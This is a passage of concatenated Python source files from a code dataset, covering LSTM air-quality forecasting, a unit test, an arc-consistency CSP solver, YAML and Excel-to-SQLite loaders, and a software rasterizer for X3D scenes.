pyplot.legend()\r\n i += 1\r\n else:\r\n pyplot.savefig('img/bj_{}_test.png'.format(self.name))\r\n\r\n #print(\"inv_y\")\r\n #print(inv_y.head(5))\r\n #print(\"inv_yhat\")\r\n #print(inv_yhat.head(5))\r\n\r\n def validation(self, plot_image=True):\r\n y_hat = self.model.predict(self.X_te)\r\n if debug:\r\n dd = pd.DataFrame(y_hat)\r\n print('y_hat.shape= {}, value={}'.format(dd.shape, dd.values))\r\n\r\n self.X_te = self.X_te.reshape((self.X_te.shape[0], self.n_steps * self.n_features))\r\n\r\n # invert scaling for forecast\r\n inv_yhat = np.concatenate((y_hat, self.X_te[:, -self.n_ignore:]), axis=1)\r\n inv_yhat = self.scaler.inverse_transform(inv_yhat)\r\n inv_yhat = inv_yhat[:, -self.n_features+2:-self.n_ignore]\r\n\r\n if debug:\r\n print('y_hat = {}, inv_yhat = {}'.format(y_hat.shape, inv_yhat.shape))\r\n\r\n # invert scaling for actual\r\n inv_y = np.concatenate((self.y_te, self.X_te[:, -self.n_ignore:]), axis=1)\r\n inv_y = self.scaler.inverse_transform(inv_y)\r\n inv_y = inv_y[:, -self.n_features+2:-self.n_ignore]\r\n\r\n if debug:\r\n print('y_te = {}, inv_y = {}'.format(self.y_te.shape, inv_y.shape))\r\n\r\n # calculate RMSE, MAPE, R2\r\n rmse = sqrt(mean_squared_error(inv_y, inv_yhat))\r\n mape = mean_absolute_error(inv_y, inv_yhat)\r\n r2 = r2_score(inv_y, inv_yhat)\r\n if debug:\r\n print('Test RMSE: %.3f, MAPE: %.3f, R2 Score: %.3f' % (rmse, mape, r2))\r\n\r\n # Show data\r\n if plot_image:\r\n self.plot_test(inv_y, inv_yhat, [rmse, mape, r2])\r\n\r\n def predict(self, forecast_data, hours=48):\r\n if debug:\r\n print('------------- predict 48hours --------------')\r\n print('Shape = {}, Columns = {}'.format(forecast_data.shape, forecast_data.columns.tolist()))\r\n print(forecast_data)\r\n\r\n # ensure all data is float\r\n forecast_data.fillna(0, inplace=True)\r\n forecast_values = forecast_data.values\r\n forecast_values = forecast_values.astype('float64')\r\n\r\n # normalize features\r\n scaled = self.scaler.transform(forecast_values)\r\n\r\n if debug:\r\n dd = pd.DataFrame(scaled)\r\n print('scaled rows= {}, columns= {} -> {}'.format(len(dd), len(dd.columns.tolist()), dd.columns.tolist()))\r\n\r\n for hr in range(0, hours):\r\n step_hr = ld.series_to_supervised(scaled[hr:hr+self.n_steps+1, :], self.n_steps, 1, dropnan=False)\r\n if debug and hr == 0:\r\n print('step_hr = {}, hour = #{} ~ #{}'.format(step_hr.shape, hr, hr+self.n_steps))\r\n\r\n # drop columns we don't want to predict (last utctime ~ weather)\r\n step_hr.drop(step_hr.columns[[range(-self.n_ignore, 0, 1)]], axis=1, inplace=True)\r\n\r\n # split into input (and outputs)\r\n n_obs = self.n_steps * self.n_features\r\n if debug and hr == 0:\r\n print('step_hr = {}, n_obs = {:d}'.format(step_hr.shape, n_obs))\r\n\r\n step_np = step_hr.values\r\n X_te = step_np[:, :n_obs]\r\n\r\n # reshape input to be 3D [samples, timesteps, features]\r\n X_te = X_te.reshape((X_te.shape[0], self.n_steps, self.n_features))\r\n\r\n # predict next 1 hour\r\n y_hat = self.model.predict(X_te)\r\n\r\n #if debug:\r\n # print('#{:02d}: y_hat = {}'.format(hr, y_hat[n_steps]))\r\n # print('#{:02d}:+n_steps = {}'.format(hr, scaled[hr+n_steps, :]))\r\n scaled[hr+self.n_steps, 2:-self.n_ignore] = y_hat[self.n_steps, 2:]\r\n hr += 1\r\n else:\r\n # invert scaling for forecast\r\n scaled_back = self.scaler.inverse_transform(scaled)\r\n if debug:\r\n print('------- after predict --------')\r\n dd = pd.DataFrame(scaled_back)\r\n print(len(dd), dd)\r\n\r\n results = scaled_back[self.n_steps:, :-self.n_ignore]\r\n\r\n ft = pd.DataFrame(results, columns=['hour', 'weekday', 'PM2.5', 'PM10', 'O3', 'NO2', 'CO', 'SO2'])\r\n\r\n def gen_name_tag(row):\r\n return '{}#{}'.format(self.station_name, row.name)\r\n\r\n ft['test_id'] = ft.apply(gen_name_tag, axis=1)\r\n ft = ft[['test_id', 'PM2.5', 'PM10', 'O3']]\r\n\r\n # correct invalid output: output may not negative\r\n ft.loc[ft['PM2.5'] < 0, 'PM2.5'] = 0.01\r\n ft.loc[ft['PM10'] < 0, 'PM10'] = 0.01\r\n ft.loc[ft['O3'] < 0, 'O3'] = 0.01\r\n\r\n if debug:\r\n print('------- Prediction Data -------')\r\n print(len(ft), ft)\r\n\r\n return ft\r\n\r\n\r\ndef train_eval(n_epoch=100):\r\n if debug:\r\n print('######### Load Historical data for training ########')\r\n\r\n df, n_features, n_ignore = load_historical_data()\r\n\r\n if debug:\r\n print('##### n_features = {:d}, n_ignore = {:d}, records = {:d}'.format(n_features, n_ignore, len(df)))\r\n print(df.head(5))\r\n\r\n # split data by station\r\n n_steps = 6\r\n stations = reframed_for_lstm(df, n_steps, n_features, n_ignore)\r\n\r\n if debug:\r\n print('######### Build Forecasting Test data for submission ########')\r\n test_data = bt.build_test_data('bj', n_steps)\r\n\r\n if debug:\r\n print('###### forecast test: {}'.format(test_data.columns.tolist()))\r\n\r\n forecast_sum = pd.DataFrame()\r\n\r\n for station in stations:\r\n lstm = RNN_LSTM(station, n_steps, n_features, n_ignore, 200)\r\n history = lstm.train(n_epochs=n_epoch, n_batch_size=72)\r\n lstm.plot_train(history)\r\n lstm.validation()\r\n\r\n station_data = test_data[test_data['stationid'] == station['station']]\r\n station_data = station_data.drop(columns=station_data.columns[[0]], axis=1)\r\n\r\n if debug:\r\n print('###### Run Prediction: {}, Shape = {}'.format(station['station'], station_data.shape))\r\n\r\n forecast_result = lstm.predict(station_data, 48)\r\n submit.save_station('bj', station['station'], forecast_result)\r\n forecast_sum = forecast_sum.append(forecast_result, ignore_index=True)\r\n break\r\n\r\n submit.save_city('bj', forecast_sum)\r\n return forecast_sum\r\n\r\n\r\nif __name__ == '__main__':\r\n train_eval()\r\n","sub_path":"beijing_train.py","file_name":"beijing_train.py","file_ext":"py","file_size_in_byte":17873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"423064527","text":"\"\"\"\n api/codes 로시작하는 endpoint 를 테스트한다.\n\"\"\"\nimport unittest\nfrom application import db\nfrom application.models.schema.code import Code\nfrom application.tests.base import BaseTestCase\nfrom application.tests.fixtures import setup_code_fixture\nfrom application.models.company import CompanyModel\n\n\nclass TestApiCompany(BaseTestCase):\n def setUp(self):\n super().setUp()\n setup_code_fixture()\n\n def test_insert_company(self):\n \"\"\"\n 아무 파라미터가 없는경우, 가장 최근 장의 주가들을 보여준다.\n \"\"\"\n codes = db.session.query(Code).limit(30).all()\n company_list = CompanyModel.insert_or_update_company_from_code(codes)\n company_name_from_codes = []\n for code in codes:\n company_name_from_codes.append(code.code_name)\n company_name_from_list = []\n for company in company_list:\n company_name_from_list.append(company[\"code_name\"])\n\n self.assertTrue(set(company_name_from_list) <= set(company_name_from_codes))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"application/tests/models/test_company.py","file_name":"test_company.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"263533746","text":"import sys\nsys.path.insert(0, \"../../basic-graph-search/Graph\")\n\nfrom domgraph import DomainGraph\nimport copy\n\n\"\"\"\n\tThis class runs the Arc Consistency algoithm\n\t(Constraint Propagation), which detects bad\n\tchoices very fast while solving a CSP, increa-\n\tsing the solution speed.\n\"\"\"\n\nclass ArcConsistency(DomainGraph):\n\tdef refreshDomain(self):\n\t\tfor vertex in self.transit_mat:\n\t\t\tif self.value[vertex] is not None:\n\t\t\t\tfor neighbor in self.transit_mat[vertex]:\n\t\t\t\t\tif self.value[vertex] in self.domain[neighbor]:\n\t\t\t\t\t\tself.domain[neighbor].remove(self.value[vertex])\n\n\tdef __backtracking__(self, changes):\n\t\tfor change in changes:\n\t\t\tvertex, val = change\n\t\t\tself.domain[vertex].update({val})\n\n\tdef consistentAttrib(self, start_vertex, value, ret_changes=True):\n\t\t\"\"\"\n\t\t\tRun Arc Consistency algorithm.\n\t\t\"\"\"\n\n\t\tchanges = []\n\t\tqueue = []\n\n\t\t# The first step is the Forward checking: if the current\n\t\t# attribution empty a neighbor domain, then that attribution\n\t\t# will not lead to a solution and, therefore, must be cancelled.\n\t\tfor neighbor in self.transit_mat[start_vertex]:\n\t\t\tif self.value[neighbor] is None:\n\t\t\t\tif self.domain[neighbor] == {value}:\n\t\t\t\t\tself.__backtracking__(changes)\n\t\t\t\t\treturn None\n\n\t\t\t\tqueue.append((start_vertex, neighbor))\n\n\t\t# Repeat for\n\t\t#\t- All adjacent vertexes of current vertex, which must be\n\t\t#\t\tthe vertex of the last CSP iteration assigment\n\t\t#\t- All vertex whose domain changed during the constraint\n\t\t#\t\tpropagation process \n\t\twhile queue:\n\t\t\tcur_edge = queue.pop(0)\n\n\t\t\tascendant, incident = cur_edge\n\n\t\t\t# A consistent domain is a domain whose\n\t\t\t# for ALL values in it, there is AT LEAST ONE another consistent\n\t\t\t# value for all non-assigned neighbors.\n\t\t\tfor val in copy.copy(self.domain[incident]):\n\t\t\t\t# If domain of ascendant (neighbor) vertex is just the current\n\t\t\t\t# value, then that value is inconsistent\n\t\t\t\tif self.domain[ascendant] == {val}:\n\t\t\t\t\tif self.domain[incident] == {val}:\n\t\t\t\t\t\t# If incident domain is just the current \"val\",\n\t\t\t\t\t\t# then the last assignment is inconsistent.\n\t\t\t\t\t\t# Undo changes and return False\n\t\t\t\t\t\tself.__backtracking__(changes)\n\t\t\t\t\t\treturn None\n\n\t\t\t\t\t# Else, remove that value from the incident vertex domain,\n\t\t\t\t\t# and add all its neighbors to the queue to verify if it\n\t\t\t\t\t# created some inconsistency due to domain change\n\t\t\t\t\tself.domain[incident].remove(val)\n\n\t\t\t\t\tchanges.append((incident, val))\n\n\t\t\t\t\tfor incident_neighbor in self.transit_mat[incident]:\n\t\t\t\t\t\t# Just verify unassigned variables (neighbors)\n\t\t\t\t\t\tif self.value[incident_neighbor] is None:\n\t\t\t\t\t\t\tqueue.append((incident, incident_neighbor))\n\n\t\t# Process of propagating constraints ended successfully\n\t\tself.value[start_vertex] = value\n\n\t\t# Remove given value just in case, due to backtracking possibilities\n\t\tself.domain[start_vertex].remove(value)\n\t\tchanges.append((start_vertex, value))\n\n\t\t# The reason for returning the changes are to enable future\n\t\t# backtrackings, if necessary, in the next CSP iterations/states\n\t\tif ret_changes:\n\t\t\treturn changes\n\n\t\treturn None\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) < 4:\n\t\tprint(\"usage:\", sys.argv[0], \n\t\t\t\" \",\n\t\t\t\" [separator - default is \\\",\\\"]\")\n\t\texit(1)\n\n\ttry:\n\t\tsep = sys.argv[4]\n\t\tif not sep:\n\t\t\traise Exception\n\texcept:\n\t\tsep = \",\"\n\n\tac = ArcConsistency(filepath=sys.argv[1], sep=sep)\n\n\tac.print_graph()\n\n\tac.refreshDomain()\n\n\tchanges = ac.consistentAttrib(sys.argv[2], sys.argv[3])\n\n\tprint(\"\\nValues:\")\n\tfor vertex in ac.value:\n\t\tprint(vertex, \"\\t:\", ac.value[vertex])\n\n\tprint(\"\\nDomains:\")\n\tfor vertex in ac.domain:\n\t\tprint(vertex, \"\\t:\", ac.domain[vertex])\n\n\tprint(\"\\nChanges made:\", changes)\n","sub_path":"constraint-satisfaction-problems/coloring-maps/arcconsistency.py","file_name":"arcconsistency.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"165884670","text":"# Author: lindafang\n# Date: 2020-08-14 10:45\n# File: get_yaml.py\n\nimport yaml\n\n\ndef get_yaml_data(yaml_file):\n # 打开yaml文件\n with open(yaml_file, 'r', encoding=\"utf-8\") as file:\n file_data = file.read()\n\n data = yaml.load(file_data)\n return data\n","sub_path":"src/chapter10appium/Pappium-youdao-demo/utils/get_yaml.py","file_name":"get_yaml.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"87162235","text":"import sqlite3\nimport openpyxl\nfrom openpyxl import load_workbook\nimport re\nimport datetime\nimport calendar\n\n# # Get last month date in format -> 'August2018'\n# today = datetime.datetime.now()\n# first = today.replace(day=1)\n# lastMonth = first - datetime.timedelta(days=1)\n# year = str(lastMonth.year)\n# month = str(calendar.month_name[lastMonth.month] + year)\n\n# Replace with the database name\ndb = '/Users/troysmith/Code/SarnowFoodGroup/DB/orders.db'\ncon = sqlite3.connect(db)\nprint('Connected to DB')\n\n# Replace with the complete path to youe excel workbook\nwb = load_workbook(filename='orders.xlsx')\n\n# def slugify(text, lower=1):\n# if lower == 1:\n# text = text.strip().lower()\n# text = re.sub(r'[^\\w _-]+', '', text)\n# text = re.sub(r'[- ]+', '_', text)\n# return text\n\nsheets = ['Sheet1']\n\ncount = 1\nfor sheet in sheets:\n ws = wb[sheet] \n columns= ['date', 'status', 'vendor', 'po_no', 'sarnow_no', 'qty']\n # con.execute('DROP TABLE orders')\n # query = 'CREATE TABLE orders (ID INTEGER PRIMARY KEY AUTOINCREMENT'\n # for row in next(ws.rows):\n # query += ', ' + str(row.value) + ' TEXT'\n # columns.append(str(row.value))\n # query += ');'\n # # print(query)\n # con.execute(query)\n\n tup = []\n for i, rows in enumerate(ws):\n tuprow = []\n if i == 0:\n continue\n for row in rows:\n tuprow.append(str(row.value).strip()) if str(row.value).strip() != 'None' else tuprow.append('')\n tup.append(tuple(tuprow)[:-2])\n\n insQuery1 = 'INSERT INTO orders ('\n insQuery2 = ''\n for col in columns:\n insQuery1 += col + ', '\n insQuery2 += '?, '\n insQuery1 = insQuery1[:-2] + ') VALUES('\n insQuery2 = insQuery2[:-2] + ')'\n insQuery = insQuery1 + insQuery2\n\n con.executemany(insQuery, tup)\n con.commit()\n\ncon.close()\nprint('Successfully Extracted Data and Loaded Database {}'.format(db))","sub_path":"Functions/CreateOrdersDB.py","file_name":"CreateOrdersDB.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89292365","text":"import base64\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndef parse_app_did_layer(appdidlayer): \r\n app_list = appdidlayer.split('~')\r\n appdidlayer_flat = []\r\n for app in app_list:\r\n level0 = app.split('#')\r\n app_name = level0[0]\r\n app_version = level0[1]\r\n for tmp in level0[2:]:\r\n level1 = tmp.split('|')\r\n did = level1[0]\r\n for tmp_layer in level1[1:]:\r\n appdidlayer_element = []\r\n appdidlayer_element.append(app_name)\r\n appdidlayer_element.append(app_version)\r\n appdidlayer_element.append(did)\r\n appdidlayer_element.append(tmp_layer.replace('%',' '))\r\n # Append element\r\n appdidlayer_flat.append(appdidlayer_element)\r\n return pd.DataFrame(appdidlayer_flat, columns=['app', 'version', 'designid', 'step'])\r\n\r\n\r\ndef convert_image_base64_to_array(basestring, channel_flag=-1):\r\n \"\"\"\r\n Generate matrix image from basestring\r\n :param basestring: basestring to convert to image\r\n :return: Numpy array\r\n \"\"\"\r\n imgdata = base64.b64decode(basestring)\r\n arr = np.asarray(bytearray(imgdata), dtype=np.uint8)\r\n if channel_flag == -1:\r\n # Channels are in RGB order\r\n return cv2.cvtColor(cv2.imdecode(arr, -1), cv2.COLOR_BGR2RGB)\r\n elif channel_flag == -2:\r\n # Channels are in BGR order: Default in opencv\r\n return cv2.imdecode(arr, -1)\r\n ","sub_path":"src/pipeline/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"523563317","text":"# Desenvolvido por: Luciano Soares \n# Disciplina: Computação Gráfica\n# Data: 28 de Agosto de 2020\n\nimport argparse # Para tratar os parâmetros da linha de comando\nimport x3d # Faz a leitura do arquivo X3D, gera o grafo de cena e faz traversal\nimport interface # Janela de visualização baseada no Matplotlib\nimport gpu # Simula os recursos de uma GPU\n\nimport numpy as np\n\nimport math\n\nfrom math import sin, cos \n\nstack = [\n [[1,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [0,0,0,1]]\n]\n\n\n\ndef lineCrossLine(x0, y0, x1, y1, x2, y2, x3, y3):\n if (max(x0,x1) < min(x2,x3)):\n return False \n \n a1 = (y0-y1)/(x0-x1)\n a2 = (y2-y3)/(x2-x3)\n b1 = y0 - a1*x0\n b2 = y2 - a2*x2\n\n if a1 == a2:\n return False\n \n xa = (b2 - b1) / (a1 - a2)\n\n if ( (xa < max( min(x0,x1), min(x2,x3) )) or\n (xa > min( max(x0,x1), max(x2,x3) )) ):\n return False \n else:\n return True\n\ndef shouldPaintPixel(x, y, x0, y0, x1, y1):\n diamondPoints = [(x+0.5, y), (x, y+0.5), (x+1, y+0.5), (x+0.5, y+1)]\n diamondLines = [[diamondPoints[0], diamondPoints[2]], [diamondPoints[2], diamondPoints[3]], [diamondPoints[3], diamondPoints[1]], [diamondPoints[1], diamondPoints[0]]]\n\n for line in diamondLines:\n if lineCrossLine(x0, y0, x1, y1, line[0][0], line[0][1], line[1][0], line[1][1]):\n return True\n \n return False\n\ndef polypoint2D(point, color):\n \"\"\" Função usada para renderizar Polypoint2D. \"\"\"\n color = [color[0]*255, color[1]*255, color[2]*255]\n\n for i in range(len(point)):\n point[i] = int(point[i])\n\n for x in range(gpu.GPU.width):\n for y in range(0, gpu.GPU.height):\n x_point_index = 0\n y_point_index = 1\n\n while x_point_index != len(point):\n if point[x_point_index] == x and point[y_point_index] == y:\n gpu.GPU.set_pixel(x, y, color[0], color[1], color[2])\n\n x_point_index += 2\n y_point_index += 2\n\ndef polyline2D(lineSegments, color):\n \"\"\" Função usada para renderizar Polyline2D. \"\"\"\n \n color = [color[0]*255, color[1]*255, color[2]*255]\n\n for x in range(gpu.GPU.width):\n for y in range(gpu.GPU.height):\n if shouldPaintPixel(x, y, lineSegments[0], lineSegments[1], lineSegments[2], lineSegments[3]):\n gpu.GPU.set_pixel(x, y, color[0], color[1], color[2])\n\n\n# funçoes daqui https://www.geeksforgeeks.org/check-whether-a-given-point-lies-inside-a-triangle-or-not/\ndef areaTriangle(x1, y1, x2, y2, x3, y3): \n \n return abs((x1 * ((y2) - y3) + x2 * (y3 - y1) \n + x3 * (y1 - y2)) / 2.0) \n\ndef isInside(x1, y1, x2, y2, x3, y3, x, y): \n \n A = areaTriangle(x1, y1, x2, y2, x3, y3) \n\n A1 = areaTriangle(x, y, x2, y2, x3, y3) \n \n A2 = areaTriangle(x1, y1, x, y, x3, y3) \n \n A3 = areaTriangle(x1, y1, x2, y2, x, y) \n \n if(round(A,4) == round(A1 + A2 + A3, 4)): \n return True\n else:\n return False\n\ndef triangleSet2D(vertices, color, texture_list, image):\n \"\"\" Função usada para renderizar TriangleSet2D. \"\"\"\n # print(texture_list)\n # color = [color[0]*255, color[1]*255, color[2]*255]\n colors = [[color[i]*255, color[i+1]*255, color[i+2]*255] for i in range(0, len(color), 3)]\n\n x1 = vertices[0]\n y1 = vertices[1]\n\n x2 = vertices[2]\n y2 = vertices[3]\n\n x3 = vertices[4]\n y3 = vertices[5]\n\n # # sem antialiazing\n # for x in range(gpu.GPU.width):\n # for y in range(gpu.GPU.height):\n\n # if isInside(vertices[0], vertices[1], vertices[2], vertices[3], vertices[4], vertices[5], x+0.5, y+0.5):\n # gpu.GPU.set_pixel(x, y, color[0], color[1], color[2])\n\n\n # com antialiazing\n S = [(0.25, 0.25), (0.75, 0.25), (0.75, 0.75), (0.25, 0.75)]\n \n for x in range(gpu.GPU.width):\n for y in range(gpu.GPU.height):\n quant = 0\n for s in S:\n if isInside(vertices[0], vertices[1], vertices[2], vertices[3], vertices[4], vertices[5], x+s[0], y+s[1]):\n quant += 1\n if quant > 0:\n dif = quant/4\n\n alpha = (-(x - x2)*(y3 - y2) + (y - y2)*(x3 - x2))/(-(x1 - x2)*(y3 - y2) + (y1 - y2)*(x3 - x2))\n beta = (-(x - x3)*(y1 - y3) + (y - y3)*(x1 - x3))/(-(x2 - x3)*(y1 - y3) + (y2 - y3)*(x1 - x3))\n gama = 1 - alpha - beta\n\n if len(texture_list):\n p1 = [alpha*texture_list[0], alpha*texture_list[1]]\n p2 = [beta*texture_list[2], beta*texture_list[3]]\n p3 = [gama*texture_list[4], gama*texture_list[5]]\n\n u = int((p1[0] + p2[0] + p3[0]) * len(image[0])-1)\n v = int((p1[1] + p2[1] + p3[1]) * len(image)-1)\n\n # print(p1, p2, p3)\n \n tex_color = image[u][v]\n \n gpu.GPU.set_pixel(x, y, (tex_color[0])*(dif),(tex_color[1])*(dif), (tex_color[2])*(dif))\n \n\n else:\n p1 = [c*alpha for c in colors[0]]\n p2 = [c*beta for c in colors[1]]\n p3 = [c*gama for c in colors[2]]\n\n gpu.GPU.set_pixel(x, y, (p1[0]+p2[0]+p3[0])*(dif),(p1[1]+p2[1]+p3[1])*(dif), (p1[2]+p2[2]+p3[2])*(dif))\n # gpu.GPU.set_pixel(x, y, color[0]*(dif), color[1]*(dif), color[2]*(dif))\n\n\ndef matrixToArray(matrix):\n arr = []\n for i in range(3):\n arr.append(int(matrix[0][i]))\n arr.append(int(matrix[1][i]))\n return arr\n\ndef triangleSet(point, color, texture_list = [], image = None):\n \"\"\" Função usada para renderizar TriangleSet. \"\"\"\n # Nessa função você receberá pontos no parâmetro point, esses pontos são uma lista\n # de pontos x, y, e z sempre na ordem. Assim point[0] é o valor da coordenada x do\n # primeiro ponto, point[1] o valor y do primeiro ponto, point[2] o valor z da \n # coordenada z do primeiro ponto. Já point[3] é a coordenada x do segundo ponto e\n # assim por diante.\n # No TriangleSet os triângulos são informados individualmente, assim os três\n # primeiros pontos definem um triângulo, os três próximos pontos definem um novo\n # triângulo, e assim por diante.\n\n triangleMatrixes = []\n\n # print(\"==================\")\n # print(len(point))\n # print(point)\n\n for i in range(0,len(point),9):\n triangleMatrixes.append([[point[i], point[i+3], point[i+6]], \n [point[i+1], point[i+4], point[i+7]], \n [point[i+2], point[i+5], point[i+8]],\n [1, 1, 1 ]])\n\n\n for matrix in triangleMatrixes:\n\n temp = np.matmul(stack[-1], np.array(matrix))\n temp2 = np.matmul(lookAt, temp)\n temp3 = np.matmul(projectionMatrix, temp2)\n temp35 = temp3 / temp3[3][0]\n temp4 = np.matmul(screenMatrix, temp35)\n triangleSet2D(matrixToArray(temp4), color, texture_list, image)\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"TriangleSet : pontos = {0}\".format(point)) # imprime no terminal pontos\n\ndef viewpoint(position, orientation, fieldOfView):\n \"\"\" Função usada para renderizar (na verdade coletar os dados) de Viewpoint. \"\"\"\n # Na função de viewpoint você receberá a posição, orientação e campo de visão da\n # câmera virtual. Use esses dados para poder calcular e criar a matriz de projeção\n # perspectiva para poder aplicar nos pontos dos objetos geométricos.\n \n global lookAt\n global LARGURA\n global ALTURA\n global projectionMatrix\n\n orientationMatrix = getRotationMatrix([orientation[0], orientation[1], orientation[2], -orientation[3]])\n\n # orientationMatrix = np.identity(4)\n\n translationMatrix = [\n [1,0,0,-position[0]],\n [0,1,0,-position[1]],\n [0,0,1,-position[2]],\n [0,0,0, 1]\n ]\n\n lookAt = np.matmul(orientationMatrix, translationMatrix)\n\n aspect = LARGURA/ALTURA\n fovy = fieldOfView\n near = 0.5\n top = near * math.tan(fovy)\n right = top * aspect\n far = 100\n\n projectionMatrix = [\n [near/right, 0, 0, 0],\n [ 0, near/top, 0, 0],\n [ 0, 0, -((far+near)/(far-near)), (-2*far*near)/(far-near)],\n [ 0, 0, -1, 0]\n ]\n\n print(np.array(lookAt))\n print(np.array(projectionMatrix))\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Viewpoint : position = {0}, orientation = {1}, fieldOfView = {2}\".format(position, orientation, fieldOfView)) # imprime no terminal\n\ndef getRotationMatrix(rotation):\n theta = rotation[3]\n if rotation[0]:\n #x\n return [\n [1, 0, 0, 0],\n [0, cos(theta), -sin(theta), 0],\n [0, sin(theta), cos(theta), 0],\n [0, 0, 0, 1]\n ]\n elif rotation[1]:\n #y\n return [\n [cos(theta), 0, sin(theta), 0],\n [0, 1, 0, 0],\n [-sin(theta), 0, cos(theta), 0],\n [0, 0, 0, 1]\n ]\n elif rotation[2]:\n #z\n return [\n [cos(theta), -sin(theta), 0, 0],\n [sin(theta), cos(theta), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]\n ]\n else:\n return[\n [1,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [0,0,0,1]\n ]\n\n\n\ndef transform(translation, scale, rotation):\n \"\"\" Função usada para renderizar (na verdade coletar os dados) de Transform. \"\"\"\n # A função transform será chamada quando se entrar em um nó X3D do tipo Transform\n # do grafo de cena. Os valores passados são a escala em um vetor [x, y, z]\n # indicando a escala em cada direção, a translação [x, y, z] nas respectivas\n # coordenadas e finalmente a rotação por [x, y, z, t] sendo definida pela rotação\n # do objeto ao redor do eixo x, y, z por t radianos, seguindo a regra da mão direita.\n # Quando se entrar em um nó transform se deverá salvar a matriz de transformação dos\n # modelos do mundo em alguma estrutura de pilha.\n\n newMatrix = stack[-1].copy()\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Transform : \", end = '')\n if scale:\n scaleMatrix = [[scale[0], 0, 0, 0],\n [0, scale[1],0, 0],\n [0, 0, scale[2],0], \n [0, 0, 0, 1]]\n\n # newMatrix = np.matmul(scaleMatrix, newMatrix)\n newMatrix = np.matmul(newMatrix, scaleMatrix)\n print(\"scale = {0} \".format(scale), end = '') # imprime no terminal\n if rotation:\n rotationMatrix = getRotationMatrix(rotation)\n # newMatrix = np.matmul(rotationMatrix, newMatrix)\n newMatrix = np.matmul(newMatrix, rotationMatrix)\n\n print(\"rotation = {0} \".format(rotation), end = '') # imprime no terminal\n if translation:\n translationMatrix = [[1,0,0,translation[0]],\n [0,1,0,translation[1]],\n [0,0,1,translation[2]], \n [0,0,0, 1]]\n # newMatrix = np.matmul(translationMatrix, newMatrix)\n newMatrix = np.matmul(newMatrix, translationMatrix)\n print(\"translation = {0} \".format(translation), end = '') # imprime no terminal\n \n stack.append(newMatrix)\n # for m in stack:\n # print(m)\n # print()\n # print(\"\")\n\ndef _transform():\n \"\"\" Função usada para renderizar (na verdade coletar os dados) de Transform. \"\"\"\n # A função _transform será chamada quando se sair em um nó X3D do tipo Transform do\n # grafo de cena. Não são passados valores, porém quando se sai de um nó transform se\n # deverá recuperar a matriz de transformação dos modelos do mundo da estrutura de\n # pilha implementada.\n\n stack.pop()\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"Saindo de Transform\")\n\ndef triangleStripSet(point, stripCount, color):\n \"\"\" Função usada para renderizar TriangleStripSet. \"\"\"\n # A função triangleStripSet é usada para desenhar tiras de triângulos interconectados,\n # você receberá as coordenadas dos pontos no parâmetro point, esses pontos são uma\n # lista de pontos x, y, e z sempre na ordem. Assim point[0] é o valor da coordenada x\n # do primeiro ponto, point[1] o valor y do primeiro ponto, point[2] o valor z da\n # coordenada z do primeiro ponto. Já point[3] é a coordenada x do segundo ponto e assim\n # por diante. No TriangleStripSet a quantidade de vértices a serem usados é informado\n # em uma lista chamada stripCount (perceba que é uma lista).\n\n newPoint = []\n\n for I in range(int(stripCount[0]-2)):\n i = 3*I\n for j in range(9):\n newPoint.append(point[i+j])\n\n \n # newPoint.append(point[i+1])\n # newPoint.append(point[i+2])\n # newPoint.append(point[i+3])\n # newPoint.append(point[i+4])\n # newPoint.append(point[i+5])\n # newPoint.append(point[i+6])\n # newPoint.append(point[i+7])\n # newPoint.append(point[i+8])\n \n triangleSet(newPoint, color)\n\n\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"TriangleStripSet : pontos = {0} \".format(point), end = '') # imprime no terminal pontos\n for i, strip in enumerate(stripCount):\n print(\"strip[{0}] = {1} \".format(i, strip), end = '') # imprime no terminal\n print(\"\")\n\ndef indexedTriangleStripSet(point, index, color):\n \"\"\" Função usada para renderizar IndexedTriangleStripSet. \"\"\"\n # A função indexedTriangleStripSet é usada para desenhar tiras de triângulos\n # interconectados, você receberá as coordenadas dos pontos no parâmetro point, esses\n # pontos são uma lista de pontos x, y, e z sempre na ordem. Assim point[0] é o valor\n # da coordenada x do primeiro ponto, point[1] o valor y do primeiro ponto, point[2]\n # o valor z da coordenada z do primeiro ponto. Já point[3] é a coordenada x do\n # segundo ponto e assim por diante. No IndexedTriangleStripSet uma lista informando\n # como conectar os vértices é informada em index, o valor -1 indica que a lista\n # acabou. A ordem de conexão será de 3 em 3 pulando um índice. Por exemplo: o\n # primeiro triângulo será com os vértices 0, 1 e 2, depois serão os vértices 1, 2 e 3,\n # depois 2, 3 e 4, e assim por diante.\n newPoint = []\n for I in range(len(index)):\n if index[I+2] == -1:\n break\n i = 3*int(index[I])\n for j in range(9):\n newPoint.append(point[i+j])\n\n triangleSet(newPoint, color)\n # O print abaixo é só para vocês verificarem o funcionamento, deve ser removido.\n print(\"IndexedTriangleStripSet : pontos = {0}, index = {1}\".format(point, index)) # imprime no terminal pontos\n\ndef box(size, color):\n \"\"\" Função usada para renderizar Boxes. \"\"\"\n # A função box é usada para desenhar paralelepípedos na cena. O Box é centrada no\n # (0, 0, 0) no sistema de coordenadas local e alinhado com os eixos de coordenadas\n # locais. O argumento size especifica as extensões da caixa ao longo 